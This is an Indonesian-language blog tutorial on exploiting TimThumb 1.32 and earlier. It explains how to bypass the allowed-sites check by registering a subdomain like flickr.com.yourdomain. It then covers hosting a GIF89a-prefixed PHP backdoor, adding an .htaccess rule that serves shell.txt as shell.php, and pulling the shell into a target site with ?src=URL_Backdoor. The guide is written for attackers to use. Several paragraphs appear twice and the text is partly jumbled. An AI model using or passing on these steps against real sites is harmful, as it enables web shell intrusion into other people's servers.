cara membuat Exploit Timthumb 1.32 Untuk Timthumb
Rabu, 27 Februari 2019
Edit
oke kali ini kita akan membahas bagaimana cara membuat exploit timthumb 1.32 kebawah.TimThumb adalah skrip PHP sederhana, fleksibel, yang mengubah ukuran gambar.timthumb di bawah 1.32 memiliki bug di mana kita dapat memanipulasi dalam $ allowSites $ allowedsites:
Ok lgsg saja kita bahas cara membuat Payload Backdoor Timthumb
Jadi kita bisa membuat subdomain seperti flickr.com.domainkalian. dan letakkan shell remote di situs itu.
intinya kalian harus buat subdo sperti di atas.
Bagaimana cara membuat shell ??
pertama, kalianharus meletakkan GIF89a; , Header gif ini berfungsi sehingga eksekutor dalam timthumb membaca bahwa Backload Payload yang Anda buat adalah gambar gif. seperti ini :
langsung saja buat backdoor dgn ext .txt,pada line pling atas isi header gif di atas.
Jika sudah berhasil kalian dapat membukanya
Contoh: http://flickr.com.domain.com/shell.php
Output hanya source code mentah dari php.
Kemudian cara eksploiatsi dengan cara menambahkan ?src=URL_Backdoor pada timthumb.php
Ok lgsg saja kita bahas cara membuat Payload Backdoor Timthumb
- kalian harus memilik sebuah cpanel dan domain,untuk domain dan cpanel terserah karena kita akan menambahkan subdomain di domain milik kalian.
- di sini saya anggap kalian sudah memiliki cpanel atau hosting dan domain
- buat subdomain yang termasuk allowed:
$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
);
di atas adl ptongan source code yg di ambil dari timthumb.php versi 1.32
if (strpos (strtolower ($src), 'http://') !== false || strpos (strtolower ($src), 'https://') !== false) if (strpos (strtolower ($url_info['host']), $site) !== false)
Jadi kita bisa membuat subdomain seperti flickr.com.domainkalian. dan letakkan shell remote di situs itu.
intinya kalian harus buat subdo sperti di atas.
Bagaimana cara membuat shell ??
pertama, kalianharus meletakkan GIF89a; , Header gif ini berfungsi sehingga eksekutor dalam timthumb membaca bahwa Backload Payload yang Anda buat adalah gambar gif. seperti ini :
GIF89a;Header gif ini berfungsi supaya executor dalam timthumb tersebut membaca bahwa Payload Backdoor yang kamu buat adalah sebuah gambar gif.
<?php
?>
langsung saja buat backdoor dgn ext .txt,pada line pling atas isi header gif di atas.
- buat file .htaccess
RewriteEngine on RewriteRule ^shell\.php$ /shell.txt [L]
- Fungsinya adalah memanggil configurasi webserver supaya dapat me Rewrite/Rename file .txt tersebut menjadi format .php.
Jika sudah berhasil kalian dapat membukanya
Contoh: http://flickr.com.domain.com/shell.php
Output hanya source code mentah dari php.
Kemudian cara eksploiatsi dengan cara menambahkan ?src=URL_Backdoor pada timthumb.php
